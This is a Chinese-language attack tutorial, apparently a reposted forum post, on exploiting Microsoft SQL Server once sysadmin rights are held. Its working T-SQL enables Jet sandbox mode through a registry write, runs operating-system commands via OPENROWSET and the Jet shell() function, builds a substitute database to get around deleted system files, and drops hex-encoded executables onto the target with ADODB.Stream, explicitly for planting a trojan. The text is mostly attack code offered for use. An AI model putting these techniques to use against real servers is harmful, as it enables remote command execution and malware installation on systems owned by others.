以下 *** 都以需要SA权限为前提。 
1, 沙盒模式的变通. 

原始 *** : 
之一句开启沙盘模式：exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1 
复制代码第二句利用jet.oledb执行系统命令：select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\dnary.mdb’,’select shell("CMD命令")’) 
复制代码或select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\ias.mdb’,’select shell("CMD命令")’) 
复制代码但是,当 X:\Windows\System32\ias\dnary.mdb 或 X:\Windows\System32\ias\ias.mdb 被删除时,命令就会无效了. 
所以利用以下语句创建一个数据库：(数据库名SysSetup.xml,后缀.xml是自定义,不影响使用.) 

复制代码代码如下:
declare @hr int 
declare @object int;declare @property int 
exec @hr = sp_OACreate ’ADOX.Catalog’,@object OUTPUT 
exec @hr = sp_OAMethod @object,’Create’,@property output,’Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysSetup.xml’ 

然后再利用jet.oledb调用SysSetup.xml执行系统命令：select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=SysSetup.xml’,’select shell("CMD命令")’) 


2, 直接写入文件到对方计算机,此处的文件可以是exe, dll,等.(注,此 *** 不支持文件大于64KB) 
当已经有一个程序需要放到对方计算机的时候.(例如, 放MA。) 
将这个文件转成HEX代码。 
如果不知道怎么把文件转成HEX代码,请使用下面的工具. 
File2Hex.rar (424 Bytes) 

使用 *** 很简单, 解压出来之后, 把要转的文件拖到脚本上去, 就会生成包含HEX代码的文本. 
然后用以下 *** 写入到对方计算机中。 

复制代码代码如下:
DECLARE @ObjectToken INT 
EXEC sp_OACreate ’ADODB.Stream’, @ObjectToken OUTPUT 
EXEC sp_OASetProperty @ObjectToken, ’Type’, 1 
EXEC sp_OAMethod @ObjectToken, ’Open’ 
EXEC sp_OAMethod @ObjectToken, ’Write’, NULL, 0x123456(其中0x123456为HEX内容) 
EXEC sp_OAMethod @ObjectToken, ’SaveToFile’, NULL, ’Test.exe(文件名)’, 2 
EXEC sp_OAMethod @ObjectToken, ’Close’ 
EXEC sp_OADestroy @ObjectToken